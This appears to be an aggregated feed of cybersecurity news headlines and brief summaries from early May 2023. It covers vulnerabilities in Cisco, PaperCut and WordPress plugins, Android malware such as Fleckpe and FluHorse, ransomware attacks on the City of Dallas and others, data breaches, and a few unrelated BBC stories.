                exploits
                2023-05-05 https://thehackernews.com/2023/05/cisco-warns-of-vulnerability-in-popular.html
                Cisco has warned of a critical security flaw in SPA112 2-Port Phone Adapters that it said could be exploited by a remote attacker to execute arbitrary code on affected devices. The issue, tracked as CVE-2023-20126, is rated 9.8 out of a maximum of 10 on the CVSS scoring system. The company credited Catalpa of DBappSecurity for reporting the shortcoming. The product in question makes it possible



                Former Uber CSO avoids prison for concealing data breach

                financial
                2023-05-05 https://www.helpnetsecurity.com/2023/05/05/joe-sullivan-sentenced/

                Joe Sullivan, the former Uber CSO who was convicted last year of attempting to cover up a data breach Uber suffered in 2016 and of keeping it hidden from the Federal Trade Commission (FTC), has been sentenced to three years of probation plus 200 hours of community service. The conviction: Sullivan became Chief Security Officer at Uber in April 2015, and in November 2016 testified before the FTC under oath that the company had taken … More

                The post Former Uber CSO avoids prison for concealing data breach appeared first on Help Net Security.




                Critical RCE vulnerability in Cisco phone adapters, no update available (CVE-2023-20126)

                exploits
                2023-05-05 https://www.helpnetsecurity.com/2023/05/05/cve-2023-20126/

                Cisco has revealed the existence of a critical vulnerability (CVE-2023-20126) in the web-based management interface of Cisco SPA112 2-Port Phone Adapters. The adapters are widely used to integrate analog phones into VoIP networks without the need for an upgrade. About the vulnerability (CVE-2023-20126): CVE-2023-20126 can be exploited without prior authentication. “This vulnerability is due to a missing authentication process within the firmware upgrade function. An attacker could exploit this vulnerability by upgrading an affected device … More

                The post Critical RCE vulnerability in Cisco phone adapters, no update available (CVE-2023-20126) appeared first on Help Net Security.




                N. Korean Kimsuky Hackers Using New Recon Tool ReconShark in Latest Cyberattacks

                ciber
                2023-05-05 https://thehackernews.com/2023/05/n-korean-kimsuky-hackers-using-new.html
                The North Korean state-sponsored threat actor known as Kimsuky has been discovered using a new reconnaissance tool called ReconShark as part of an ongoing global campaign. "[ReconShark] is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros," SentinelOne researchers Tom Hegel

                Autosummary: Active since at least 2012, the prolific threat actor has been linked to targeted attacks on non-governmental organizations (NGOs), think tanks, diplomatic agencies, military organizations, economic groups, and research entities across North America, Asia, and Europe.


                Fleckpe Android Malware Sneaks onto Google Play Store with Over 620,000 Downloads

                exploits
                2023-05-05 https://thehackernews.com/2023/05/fleckpe-android-malware-sneaks-onto.html
                A new Android subscription malware named Fleckpe has been unearthed on the Google Play Store, amassing more than 620,000 downloads in total since 2022. Kaspersky, which identified 11 apps on the official app storefront, said the malware masqueraded as legitimate photo editing apps, camera, and smartphone wallpaper packs. The apps have since been taken down. The operation primarily targets users

                Autosummary: The list of the offending apps is as follows:
                Beauty Camera Plus (com.beauty.camera.plus.photoeditor)
                Beauty Photo Camera (com.apps.camera.photos)
                Beauty Slimming Photo Editor (com.beauty.slimming.pro)
                Fingertip Graffiti (com.draw.graffiti)
                GIF Camera Editor (com.gif.camera.editor)
                HD 4K Wallpaper (com.hd.h4ks.wallpaper)
                Impressionism Pro Camera (com.impressionism.prozs.app)
                Microclip Video Editor (com.microclip.vodeoeditor)
                Night Mode Camera Pro (com.urox.opixe.nightcamreapro)
                Photo Camera Editor (com.toolbox.photoeditor)
                Photo Effect Editor (com.picture.pictureframe)
                "When the app starts, it loads a heavily obfuscated native library containing a malicious dropper that decrypts and runs a payload from the app assets," Kaspersky researcher Dmitry Kalinin said.


                Fleckpe Android malware totaled +620K downloads via Google Play Store

                exploits
                2023-05-05 https://securityaffairs.com/145771/malware/fleckpe-android-trojan.html

                Fleckpe is a new Android subscription Trojan that was discovered in the Google Play Store, totaling more than 620,000 downloads since 2022. Fleckpe is a new Android subscription Trojan that spreads via Google Play, the malware discovered by Kaspersky is hidden in photo editing apps, smartphone wallpaper packs, and other general-purpose apps. The malicious campaign […]

                The post Fleckpe Android malware totaled +620K downloads via Google Play Store appeared first on Security Affairs.




                WordPress custom field plugin bug exposes over 1M sites to XSS attacks

                exploits
                2023-05-05 https://www.bleepingcomputer.com/news/security/wordpress-custom-field-plugin-bug-exposes-over-1m-sites-to-xss-attacks/
                Security researchers warn that the "Advanced Custom Fields" and "Advanced Custom Fields Pro" WordPress plugins, with millions of installs, are vulnerable to cross-site scripting attacks (XSS). [...]

                Autosummary: [Image: Accessing "this->view" variable through the "current_screen" function (Patchstack)] The developer fixed the flaw in version 6.1.6 by implementing a new function named "esc_attr" that properly sanitizes the output value of the admin_body_class hook, hence, preventing the XSS.


                AutoCrypt KEY provides the key management features needed for automotive production

                industry
                2023-05-05 https://www.helpnetsecurity.com/2023/05/05/autocrypt-key/

                AutoCrypt KEY enables OEMs and suppliers to manage all types of cryptographic keys used for the components of connected and electric vehicles. Modern vehicles function through communications, including internal communications between ECUs and application processors, and external connections with nearby vehicles, roadside infrastructure, mobile devices, and charging stations. To ensure that all transmitted data are safely encrypted and all connected components can be securely verified, the use of cryptographic keys is essential in establishing trust … More

                The post AutoCrypt KEY provides the key management features needed for automotive production appeared first on Help Net Security.




                New Android Malware "FluHorse" Targeting East Asian Markets with Deceptive Tactics

                exploits industry
                2023-05-05 https://thehackernews.com/2023/05/new-android-malware-fluhorse-targeting.html
                Various sectors in East Asian markets have been subjected to a new email phishing campaign that distributes a previously undocumented strain of Android malware called FluHorse that abuses the Flutter software development framework. "The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in

                Autosummary: "The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in a technical report.


                Hackers Targeting Italian Corporate Banking Clients with New Web-Inject Toolkit DrIBAN

                financial
                2023-05-05 https://thehackernews.com/2023/05/hackers-targeting-italian-corporate.html
                Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019. "The main goal of drIBAN fraud operations is to infect Windows workstations inside corporate environments trying to alter legitimate banking transfers performed by the victims by changing the beneficiary and transferring

                Autosummary: "All the bots that successfully pass those steps will be selected by botnet operators and considered as 'new candidates' for banking fraud operations moving forward to the next stage, where Ramnit, one of the most advanced banking trojans, will be installed," the researchers said.


                Banks warn of big increase in online scams

                financial
                2023-05-05 https://www.bbc.co.uk/news/technology-65486219?at_medium=RSS&at_campaign=KARANGA
                Barclays said 77% of scams are now happening on social media, online marketplaces and dating apps.



                New Android FluHorse malware steals your passwords, 2FA codes

                exploits
                2023-05-05 https://www.bleepingcomputer.com/news/security/new-android-fluhorse-malware-steals-your-passwords-2fa-codes/
                A new Android malware called "FluHorse" has been discovered, targeting users in Eastern Asia with malicious apps that imitate legitimate versions. [...]

                Autosummary: [Image: Malicious app interface (Check Point)] After capturing the victims' account credentials and credit card details, the apps display a "system is busy" message for 10 minutes, likely to make the process appear realistic while the operators act in the background to intercept 2FA codes and leverage the stolen data.


                New Android updates fix kernel bug exploited in spyware attacks

                exploits
                2023-05-05 https://www.bleepingcomputer.com/news/security/new-android-updates-fix-kernel-bug-exploited-in-spyware-attacks/
                Android security updates released this month patch a high-severity vulnerability exploited as a zero-day to install commercial spyware on compromised devices. [...]



                ALPHV gang claims ransomware attack on Constellation Software

                exploits ransomware
                2023-05-05 https://www.bleepingcomputer.com/news/security/alphv-gang-claims-ransomware-attack-on-constellation-software/
                Canadian diversified software company Constellation Software confirmed on Thursday that some of its systems were breached by threat actors who also stole personal information and business data. [...]

                Autosummary: Constellation Software acquires, manages, and builds software businesses through six operating groups: Volaris, Harris, Jonas, Vela Software, Perseus Group, and Topicus.


                WordPress plugin vulnerability puts two million websites at risk

                exploits
                2023-05-05 https://grahamcluley.com/wordpress-plugin-vulnerability-puts-two-million-websites-at-risk/
                Millions of WordPress-powered websites are using the Advanced Custom Fields and Advanced Custom Fields Pro plugins, which security researchers say have been vulnerable to cross-site scripting (XSS) attacks.



                The Week in Ransomware - May 5th 2023 - Targeting the public sector

                exploits ransomware
                2023-05-05 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-may-5th-2023-targeting-the-public-sector/
                This week's ransomware news has been dominated by a Royal ransomware attack on the City of Dallas that took down part of the IT infrastructure. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @serghei, @demonslay335, @billtoulas, @Ionut_Ilascu, @fwosar, @LawrenceAbrams, @BleepinComputer, @Seifreed, @AlvieriD, @WithSecure, @PogoWasRight, @pcrisk, @siri_urz, @Unit42_Intel, and @BrettCallow. The ALPHV ransomware operation, aka BlackCat, has published screenshots of internal emails and video conferences stolen from Western Digital, indicating they likely had continued access to the company's systems even as the company responded to the breach.


                Newspaper evades Russian censors, hides news in Counter-Strike map

                rusia-ucrania
                2023-05-05 https://www.malwarebytes.com/blog/news/2023/05/evading-russian-media-restrictions-with-custom-video-game-maps

                Categories: News

                Tags: Russia, Ukraine, censorship, press, freedom, restrictions, evade, counter-strike: global offensive, counter strike GO, steam, workshop, map, de_vonya

                We take a look at one newspaper's innovative way of bypassing Russian media restrictions.


                The post Newspaper evades Russian censors, hides news in Counter-Strike map appeared first on Malwarebytes Labs.


                Autosummary: [Image: This room contains independent journalism that is forbidden in Russia] A sign on one wall states “Russian strikes on civilian targets 2022-2023,” above a map highlighting strike locations, next to several photographs of the damage inflicted. The plan: hide a secret room underneath a map, which players can stumble upon and see facts, figures, and photographs of what’s been going on. [Image: Flashing lights indicate the presence of the room] Inside the room: the room itself is made up of several areas of information, with a main table located in the middle. If you click on the map to open its page, and then hit the green “Subscribe” button, the map will be available next time you load up the game.


                How AI is reshaping the cybersecurity landscape

                ciber
                2023-05-04 https://www.helpnetsecurity.com/2023/05/04/ai-cybersecurity-landscape-video/

                The success of ChatGPT, a text-generation chatbot, has sparked widespread interest in generative AI among millions of people worldwide. According to Jumio’s research, 67% of consumers globally are aware of generative AI technologies, and in certain markets, such as Singapore, 45% have utilized an application that employs such technologies. In this Help Net Security video, Leonid Belkind, CTO at Torq, talks about how AI will impact the cybersecurity industry in the next few years. Are … More

                The post How AI is reshaping the cybersecurity landscape appeared first on Help Net Security.




                Amazon Inspector allows search of its vulnerability intelligence database

                exploits
                2023-05-04 https://www.helpnetsecurity.com/2023/05/04/amazon-inspector-vulnerability-intelligence-database/

                Amazon Inspector is designed to manage vulnerabilities by continuously scanning your AWS workloads for software vulnerabilities and unintended network exposure across your entire organization. Upon activation, Amazon Inspector automatically detects all your Amazon Elastic Compute Cloud (EC2) instances, container images in Amazon Elastic Container Registry (ECR), and AWS Lambda functions on a large scale. It then continuously monitors them for known vulnerabilities, providing you with a unified view of vulnerabilities across your compute environments. It … More

                The post Amazon Inspector allows search of its vulnerability intelligence database appeared first on Help Net Security.




                Intruder launches continuous attack surface monitoring for SMBs

                ransomware
                2023-05-04 https://www.helpnetsecurity.com/2023/05/04/intruder-attack-surface-monitoring-capabilities/

                Intruder has launched its continuous attack surface monitoring capabilities. The company’s new premium plan offering takes vulnerability management to the next level with continuous coverage, increasing visibility and transparency of external attack surfaces. On average, 65 new vulnerabilities are discovered every day. Businesses of all sizes need visibility of a constantly evolving external attack surface, and to continually manage their exposure to avoid being breached. Intruder’s continuous network scanning includes adaptive attack surface scans, which … More

                The post Intruder launches continuous attack surface monitoring for SMBs appeared first on Help Net Security.




                Meta Takes Down Malware Campaign That Used ChatGPT as a Lure to Steal Accounts

                exploits
                2023-05-04 https://thehackernews.com/2023/05/meta-takes-down-malware-campaign-that.html
                Meta said it took steps to take down more than 1,000 malicious URLs from being shared across its services that were found to leverage OpenAI's ChatGPT as a lure to propagate about 10 malware families since March 2023. The development comes against the backdrop of fake ChatGPT web browser extensions being increasingly used to steal users' Facebook account credentials with an aim to run

                Autosummary: Besides using social media for propagating the ChatGPT-themed malicious URLs, the malware is hosted on a variety of legitimate services such as Buy Me a Coffee, Discord, Dropbox, Google Drive, iCloud, MediaFire, Mega, Microsoft OneDrive, and Trello.


                City of Dallas shut down IT services after ransomware attack

                exploits government ransomware
                2023-05-04 https://securityaffairs.com/145723/cyber-crime/city-of-dallas-ransomware-attack.html

                The City of Dallas, Texas, was hit by a ransomware attack that forced it to shut down some of its IT systems. The IT systems at the City of Dallas, Texas, have been targeted by a ransomware attack. To prevent the threat from spreading within the network, the City has shut down the impacted IT […]

                The post City of Dallas shut down IT services after ransomware attack appeared first on Security Affairs.


                Autosummary: The ransomware encrypts the network shares that are found on the local network, and the local drives, with the AES algorithm. In March, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to provide organizations with tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family. “Subsequently, the City has confirmed that a number of servers have been compromised with ransomware, impacting several functional areas, including the Dallas Police Department Website,” “The City team, along with its vendors, are actively working to isolate the ransomware to prevent its spread, to remove the ransomware from infected servers, and to restore any services currently impacted.”


                Ransomware gang hijacks university alert system to issue threats

                exploits
                2023-05-04 https://www.bleepingcomputer.com/news/security/ransomware-gang-hijacks-university-alert-system-to-issue-threats/
                The Avos ransomware gang hijacked Bluefield University's emergency broadcast system, "RamAlert," to send students and staff SMS texts and email alerts that their data was stolen and would soon be released. [...]

                Autosummary: However, the incident took a nasty turn on May 1st, 2023, with the Avos (aka AvosLocker) threat actors still having access to the University's RamAlert system, an emergency alert system used to warn students and staff via email and text of campus emergencies or threats.


                Patch now! The Mirai IoT botnet is exploiting TP-Link routers

                exploits industry
                2023-05-04 https://www.tripwire.com/state-of-security/patch-now-mirai-iot-botnet-exploiting-tp-link-routers
                Businesses should patch their TP-Link routers as soon as possible, after the revelation that a legendary IoT botnet is targeting them for recruitment. Read more in my article on the Tripwire State of Security blog.



                City of Dallas hit by ransomware

                exploits government ransomware
                2023-05-04 https://www.helpnetsecurity.com/2023/05/04/dallas-ransomware/

                The City of Dallas, Texas, has suffered a ransomware attack that resulted in disruption of several of its services. What do we know so far? “Wednesday morning, the City’s security monitoring tools notified our Security Operations Center (SOC) that a likely ransomware attack had been launched within our environment,” the City’s public statement revealed. “Subsequently, the City has confirmed that a number of servers have been compromised with ransomware, impacting several functional areas, including the … More

                The post City of Dallas hit by ransomware appeared first on Help Net Security.


                Autosummary: “Rather than selling Royal as a ransomware-as-a-service (RaaS), [the group] purchases direct access to corporate networks from underground Initial Access Brokers (IABs) and manages the attack campaigns internally,” BlackBerry researchers say, adding that the group is also known for engaging in double extortion tactics.


                Researchers Uncover New Exploit for PaperCut Vulnerability That Can Bypass Detection

                exploits
                2023-05-04 https://thehackernews.com/2023/05/researchers-uncover-new-exploit-for.html
                Cybersecurity researchers have found a way to exploit a recently disclosed critical flaw in PaperCut servers in a manner that bypasses all current detections. Tracked as CVE-2023-27350 (CVSS score: 9.8), the issue affects PaperCut MF and NG installations that could be exploited by an unauthenticated attacker to execute arbitrary code with SYSTEM privileges. While the flaw was patched by the

                Autosummary: But the Massachusetts-based threat intelligence firm said it discovered a new method that abuses the print management software's "User/Group Sync" feature, which makes it possible to synchronize user and group information from Active Directory, LDAP, or a custom source.


                Why the Things You Don't Know about the Dark Web May Be Your Biggest Cybersecurity Threat

                ciber
                2023-05-04 https://thehackernews.com/2023/05/why-things-you-dont-know-about-dark-web.html
                IT and cybersecurity teams are so inundated with security notifications and alerts within their own systems, it’s difficult to monitor external malicious environments – which only makes them that much more threatening. In March, a high-profile data breach hit national headlines when personally identifiable information connected to hundreds of lawmakers and staff was leaked on the dark web. The

                Autosummary: Meanwhile, as malicious software like "Info Stealer" gains more traction among cybercriminals, the dark web is still full of stories, tactics, and tips for using traditional cybercrime tools like ransomware, Trojans, spyware, adware, and more. For example, in today's world of hybrid and remote working environments, an organization's security tools are not able to secure devices like laptops, phones and tablets used outside of a business' security boundaries. Why the dark web is a threat to your organization: For cybersecurity and IT teams, one of the most threatening aspects of the dark web is that you simply don't know what you don't know.


                Facebook warns of a new information-stealing malware dubbed NodeStealer

                exploits
                2023-05-04 https://securityaffairs.com/145743/malware/facebook-warns-of-a-new-information-stealing-malware-dubbed-nodestealer.html

                Facebook discovered a new information-stealing malware, dubbed ‘NodeStealer,’ that is being distributed on Meta. NodeStealer is a new information-stealing malware distributed on Meta that allows stealing browser cookies to hijack accounts on multiple platforms, including Facebook, Gmail, and Outlook. The malware was first spotted in late January 2023 while targeting the browsers of Windows systems. It […]

                The post Facebook warns of a new information-stealing malware dubbed NodeStealer appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Facebook) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “As part of this effort, we submitted takedown requests to third-party registrars, hosting providers, and application services such as Namecheap, which were targeted by these threat actors to facilitate distribution and malicious operations.” reads the post published by Facebook. "


                Peru robbery: Shoe-shop thieves get off on the wrong foot

                latam
                2023-05-04 https://www.bbc.co.uk/news/world-latin-america-65483468?at_medium=RSS&at_campaign=KARANGA
                Three people break into a shop in Peru and make off with 200 trainers - all for the right foot.


                New Fleckpe Android malware installed 600K times on Google Play

                exploits
                2023-05-04 https://www.bleepingcomputer.com/news/security/new-fleckpe-android-malware-installed-600k-times-on-google-play/
                A new Android subscription malware named "Fleckpe" has been spotted on Google Play, the official Android app store, disguised as legitimate apps downloaded over 620,000 times. [...]

                Autosummary: Kaspersky discovered 11 Fleckpe trojan apps impersonating image editors, photo libraries, premium wallpapers, and more on Google Play, distributed under the following names: com.impressionism.prozs.app com.picture.pictureframe com.beauty.slimming.pro com.beauty.camera.plus.photoeditor com.microclip.vodeoeditor com.gif.camera.editor com.apps.camera.photos com.toolbox.photoeditor com.hd.h4ks.wallpaper com.draw.graffiti com.urox.opixe.nightcamreapro "All of the apps had been removed from the marketplace by the time our report was published, but the malicious actors might have deployed other, as yet undiscovered, apps, so the real number of installations could be higher."


                Experts devised a new exploit for the PaperCut flaw that can bypass all current detection

                exploits
                2023-05-04 https://securityaffairs.com/145752/hacking/papercut-new-exploit.html

                VulnCheck researchers devised a new exploit for a recently disclosed critical flaw in PaperCut servers that bypasses all current detections. Cybersecurity researchers from VulnCheck have developed a new exploit for the recently disclosed critical flaw in PaperCut servers, tracked as CVE-2023-27350 (CVSS score: 9.8), that bypasses all current detections. The CVE-2023-27350 flaw is a PaperCut MF/NG Improper Access […]

                The post Experts devised a new exploit for the PaperCut flaw that can bypass all current detection appeared first on Security Affairs.

                "

                Autosummary: Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The Teacher – Most Educational Blog The Entertainer – Most Entertaining Blog The Tech Whizz – Best Technical Blog Best Social Media Account to Follow (@securityaffairs) Please nominate Security Affairs as your favorite blog. "


                Get 50% off Malwarebytes Premium + Privacy in this limited-time deal

                exploits
                2023-05-04 https://www.bleepingcomputer.com/news/security/get-50-percent-off-malwarebytes-premium-plus-privacy-in-this-limited-time-deal/
                If you are concerned about the security and privacy of your online activities, this new 50% off Malwarebytes deal can bring you peace of mind. [...]

                Autosummary: The features of Malwarebytes Premium include the following: Advanced antivirus, anti-malware, anti-spyware, and more; Phishing and malicious link protection; Ransomware and zero-day exploit protection; Brute Force Protection; Uninstall Protection; Remove not only malware but adware and potentially unwanted programs as well.


                Brazil school attacks: "I always look for places to hide"

                latam
                2023-05-04 https://www.bbc.co.uk/news/world-latin-america-65414865?at_medium=RSS&at_campaign=KARANGA
                Assaults on Brazilian schools are increasing, with 13 in the past two years. What's behind the rise?


                Veza for SaaS Apps secures sensitive data against breaches, ransomware, and insider threats

                exploits ransomware
                2023-05-03 https://www.helpnetsecurity.com/2023/05/03/veza-saas-apps/

                Veza has unveiled Veza for SaaS Apps, a solution to deliver access security and governance across SaaS applications, including Salesforce, JIRA, Coupa, Netsuite, GitHub, Gitlab, Slack, and Bitbucket. The solution allows customers to automate access reviews, find and fix privilege access violations, trim privilege sprawl, and prevent SaaS misconfigurations. With this solution, Veza secures the attack surface associated with SaaS apps while enabling continuous compliance with frameworks like Sarbanes-Oxley, ISO 27001, SOC 2, and GDPR. … More

                The post Veza for SaaS Apps secures sensitive data against breaches, ransomware, and insider threats appeared first on Help Net Security.

                "

                Autosummary: "


                T-Mobile suffers second data breach this year

                financial
                2023-05-03 https://www.helpnetsecurity.com/2023/05/03/t-mobile-breach-2023/

                T-Mobile has revealed a second data breach that occurred in 2023, which reportedly exposed customer data and account PINs, leaving many T-Mobile users vulnerable to potential fraud and identity theft. What happened? The attack started on February 24 and lasted until March 30, and affected 836 customers. “In March 2023, the measures we have in place to alert us to unauthorized activity worked as designed and we were able to determine that a bad actor … More

                The post T-Mobile suffers second data breach this year appeared first on Help Net Security.

                "

                Autosummary: “The information obtained for each customer varied, but may have included full name, contact information, account number and associated phone numbers, T-Mobile account PIN, social security number, government ID, date of birth, balance due, internal codes that T-Mobile uses to service customer accounts (for example, rate plan and feature codes), and the number of lines,” the company added in the letter. "


                Hackers Exploiting 5-year-old Unpatched Vulnerability in TBK DVR Devices

                exploits
                2023-05-03 https://thehackernews.com/2023/05/hackers-exploiting-5-year-old-unpatched.html
                Threat actors are actively exploiting an unpatched five-year-old flaw impacting TBK digital video recording (DVR) devices, according to an advisory issued by Fortinet FortiGuard Labs. The vulnerability in question is CVE-2018-9995 (CVSS score: 9.8), a critical authentication bypass issue that could be exploited by remote actors to gain elevated permissions. "The 5-year-old vulnerability (


                Brightline data breach impacts 783K pediatric mental health patients

                financial
                2023-05-03 https://www.bleepingcomputer.com/news/security/brightline-data-breach-impacts-783k-pediatric-mental-health-patients/
                Pediatric mental health provider Brightline is warning patients that it suffered a data breach impacting 783,606 people after a ransomware gang stole data using a zero-day vulnerability in its Fortra GoAnywhere MFT secure file-sharing platform. [...]

                Autosummary: "Further, we implemented additional security measures, including limiting ongoing access to verified users, removing all of our data from the service, and continuing ongoing measures to reduce data exposure until an alternative file transfer solution is identified and implemented."


                Attackers are trying to exploit old DVR vulnerabilities (CVE-2018-9995, CVE-2016-20016)

                exploits
                2023-05-03 https://www.helpnetsecurity.com/2023/05/03/cve-2018-9995-cve-2016-20016/

                Five years ago, security researcher Fernandez Ezequiel discovered a vulnerability (CVE-2018-9995) in many digital video recorder (DVR) brands and released a tool for exploiting it. The vulnerability is still being exploited in the wild, FortiGuard Labs warns: the company’s intrusion prevention systems have registered 50,000+ unique exploitation attempts in the past month. About CVE-2018-9995 CVE-2018-9995 is an authentication bypass vulnerability that can be triggered with a simple exploit sent via a maliciously crafted HTTP cookie … More

                The post Attackers are trying to exploit old DVR vulnerabilities (CVE-2018-9995, CVE-2016-20016) appeared first on Help Net Security.

                "

                Autosummary: "


                Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics

                exploits industry
                2023-05-03 https://thehackernews.com/2023/05/chinese-hacker-group-earth-longzhi.html
                A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity. Trend Micro attributed the intrusion set to a cyber espionage group it tracks under the name Earth Longzhi, which is a subgroup within APT41 (aka HOODOO

                Autosummary: A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity.


                Hackers are taking advantage of the interest in generative AI to install Malware

                exploits
                2023-05-03 https://securityaffairs.com/145692/security/generative-ai-lure-malware.html

                Threat actors are using the promise of generative AI like ChatGPT to deliver malware, Facebook parent Meta warned. Threat actors are taking advantage of the huge interest in generative AI like ChatGPT to trick victims into installing malware, Meta warns. The hackers attempt to trick victims into installing malicious apps and browser extensions on their […]

                The post Hackers are taking advantage of the interest in generative AI to install Malware appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, generative AI) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Keysight launches cybersecurity partnership program for MSSPs

                ciber
                2023-05-03 https://www.helpnetsecurity.com/2023/05/03/keysight-cybersecurity-partnership-program-mssps/

                Keysight Technologies has launched a new cybersecurity partnership program for managed security service providers (MSSP) to improve the security posture of organizations using the breach and attack simulation (BAS) capabilities of Keysight Threat Simulator. Cyberattacks are on the rise and so is the cost of a data breach. IBM and the Ponemon Institute estimate that the cost of data breaches has reached an all-time high globally, averaging $4.35 million in 2022 per incident. With the … More

                The post Keysight launches cybersecurity partnership program for MSSPs appeared first on Help Net Security.

                "

                Autosummary: "


                City of Dallas hit by Royal ransomware attack impacting IT services

                exploits government ransomware
                2023-05-03 https://www.bleepingcomputer.com/news/security/city-of-dallas-hit-by-royal-ransomware-attack-impacting-it-services/
                The City of Dallas, Texas, has suffered a Royal ransomware attack, causing it to shut down some of its IT systems to prevent the attack's spread. [...]

                Autosummary: "The City team, along with its vendors, are actively working to isolate the ransomware to prevent its spread, to remove the ransomware from infected servers, and to restore any services currently impacted. Subsequently, the City has confirmed that a number of servers have been compromised with ransomware, impacting several functional areas, including the Dallas Police Department Website," explained a media statement from the City of Dallas.


                Russian hackers use WinRAR to wipe Ukraine state agency’s data

                government rusia-ucrania
                2023-05-03 https://www.bleepingcomputer.com/news/security/russian-hackers-use-winrar-to-wipe-ukraine-state-agencys-data/
                The Russian "Sandworm" hacking group has been linked to an attack on Ukrainian state networks where WinRar was used to destroy data on government devices. [...]


                Facebook disrupts new NodeStealer information-stealing malware

                exploits
                2023-05-03 https://www.bleepingcomputer.com/news/security/facebook-disrupts-new-nodestealer-information-stealing-malware/
                Facebook discovered a new information-stealing malware distributed on Meta called "NodeStealer," allowing threat actors to steal browser cookies to hijack accounts on the platform, as well as Gmail and Outlook accounts. [...]

                Autosummary: Establishing persistence (Facebook) The malware's primary goal is to steal cookies and account credentials for Facebook, Gmail, and Outlook, stored in Chromium-based web browsers like Google Chrome, Microsoft Edge, Brave, Opera, etc.


                Oracle WebLogic Server vulnerability added to CISA list as “known to be exploited”

                exploits
                2023-05-03 https://www.malwarebytes.com/blog/news/2023/05/oracle-weblogic-server-vulnerability-added-to-cisa-list-as-known-to-be-exploited

                Categories: Exploits and vulnerabilities, News

                Tags: Oracle, WebLogic, CVE-2023-21839, CVE-2023-1389, CVE-2021-45046, CISA, reverse shell

                An easy to exploit vulnerability in Oracle WebLogic Server has been added to the CISA list of things you really, really need to patch.


                The post Oracle WebLogic Server vulnerability added to CISA list as “known to be exploited” appeared first on Malwarebytes Labs.

                "

                Autosummary: Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen() , allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.Specifically, the country parameter of the write operation was not sanitized before being used in a call to , allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request. "


                Smashing Security podcast #320: City Jerks, AI animals, and is the BBC hacking again?

                government
                2023-05-03 https://grahamcluley.com/smashing-security-podcast-320-city-jerks-ai-animals-and-is-the-bbc-hacking-again/
                Two unsavoury websites suffer from a worrying leak, scientists are going animal crackers over AI, and the BBC is intercepting scammers’ live phone calls with victims. All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week … Continue reading "Smashing Security podcast #320: City Jerks, AI animals, and is the BBC hacking again?"

                Autosummary: Hosts: Graham Cluley – @gcluley, Carole Theriault – @caroletheriault. Guest: Geoff White – @geoffwhite247. Episode links: Sponsored by: Bitwarden – Password security you can trust.


                Lionel Messi: Argentina forward to leave Paris St-Germain at end of season

                latam
                2023-05-03 https://www.bbc.co.uk/sport/football/65465532?at_medium=RSS&at_campaign=KARANGA
                Lionel Messi will be looking for a new club this summer after both him and PSG decide not to extend his stay in Paris.

                Autosummary: His reluctance to commit to a new deal in recent months has frustrated PSG's Qatari owners, who believe Messi's lack of response was a clear message he didn't want to stay. The 35-year-old was suspended by PSG for two weeks on Tuesday after travelling to Saudi Arabia without the club's permission.


                Why the manufacturing sector needs stronger cyber defenses

                industry
                2023-05-02 https://www.helpnetsecurity.com/2023/05/02/manufacturing-sector-cyberattacks/

                In this Help Net Security interview, Filipe Beato, Lead, Centre for Cybersecurity, World Economic Forum, shares his expertise on the correlation between the digitization of the manufacturing sector and the rise in cyberattacks. He delves into the far-reaching impact of cyberattacks on manufacturing companies, their supply chains, and the global economy. Additionally, Beato discusses the unique nature of cyber threats faced by the manufacturing industry and the challenges of implementing effective cybersecurity measures. How has … More

                The post Why the manufacturing sector needs stronger cyber defenses appeared first on Help Net Security.

                "

                Autosummary: It contributes to global circular economies, such as consumer goods, electronics, automotive, energy, pharma, food and beverage, heavy industry and oil and gas.In this Help Net Security interview, Filipe Beato, Lead, Centre for Cybersecurity, World Economic Forum, shares his expertise on the correlation between the digitization of the manufacturing sector and the rise in cyberattacks. Early this year, in January 2023, two new EU directives also entered into force: the NIS2, which replaced the previous directive on security of network and information systems, and the Critical Entities Resilience (CER) directive which repealed a 2008 directive on European critical infrastructure. "


                Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected

                exploits
                2023-05-02 https://thehackernews.com/2023/05/active-exploitation-of-tp-link-apache.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The security vulnerabilities are as follows - CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability CVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted

                Autosummary: CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability; CVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability; CVE-2023-21839 (CVSS score: 7.5) -


                New Lobshot hVNC malware spreads via Google ads

                exploits
                2023-05-02 https://securityaffairs.com/145597/malware/lobshot-malware-hvnc.html

